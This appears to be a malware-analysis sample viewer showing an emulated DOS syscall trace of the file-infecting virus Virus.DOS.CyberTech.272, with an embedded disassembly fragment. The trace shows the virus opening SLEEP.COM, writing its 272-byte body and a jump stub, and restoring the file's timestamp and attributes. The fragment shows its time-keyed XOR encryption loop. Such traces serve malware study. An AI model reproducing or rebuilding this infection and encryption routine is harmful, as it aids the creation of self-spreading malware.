Sample viewer

vx.netlux.org/Virus.DOS.CyberTech.272

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:50:33.018863066Z	26	PC: 21e72 \| Set disk transfer address
2018-12-17T22:50:33.020947016Z	78	PC: 21e7c \| Find first file
2018-12-17T22:50:33.027558479Z	67	PC: 21e89 \| Get or set file attributes
2018-12-17T22:50:33.033765632Z	67	PC: 21e91 \| Get or set file attributes
2018-12-17T22:50:33.051988137Z	61	PC: 21e96 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:33.059401047Z	87	PC: 21e9c \| Get or set file date and time
2018-12-17T22:50:33.060892211Z	63	PC: 21ea9 \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:33.06856183Z	66	PC: 21ecf \| Move file pointer
2018-12-17T22:50:33.070039599Z	44	PC: 21ee2 \| Get time 0x21ee2: mov byte ptr cs:[bp + 0x17], dl 0x21ee7: lea si, word ptr [bp + 3] 0x21eeb: mov di, 0xfd00 0x21eee: mov cx, 0x18 0x21ef1: rep movsb byte ptr es:[di], byte ptr [si] 0x21ef3: lea si, word ptr [bp + 0x1b] 0x21ef7: mov cx, 0xf8 0x21efa: lodsb al, byte ptr [si] 0x21efb: xor al, dl 0x21efd: stosb byte ptr es:[di], al 0x21efe: loop 0x21efa 0x21f00: mov ah, 0x40 0x21f02: mov dx, 0xfd00 0x21f05: mov cx, 0x110 0x21f08: int 0x21 0x21f0a: mov ax, 0x4200 0x21f0d: call 0x31ec9 0x21f10: mov ah, 0x40 0x21f12: lea dx, word ptr [bp + 0x106] 0x21f16: mov cx, 4
2018-12-17T22:50:33.072384656Z	64	PC: 21f0a \| Write file or device (Write 272 bytes on handle 5)
2018-12-17T22:50:33.082033752Z	66	PC: 21ecf \| Move file pointer
2018-12-17T22:50:33.087518695Z	64	PC: 21f1b \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:33.094736776Z	87	PC: 21f34 \| Get or set file date and time
2018-12-17T22:50:33.096847083Z	62	PC: 21f38 \| Close file
2018-12-17T22:50:33.105480573Z	67	PC: 21f41 \| Get or set file attributes
2018-12-17T22:50:33.116387861Z	26	PC: 21f25 \| Set disk transfer address
2018-12-17T22:50:33.11813818Z	9	PC: 12a85 \| Display string (String= 'S ')
2018-12-17T22:50:33.124316894Z	0	PC: 12a89 \| Program terminate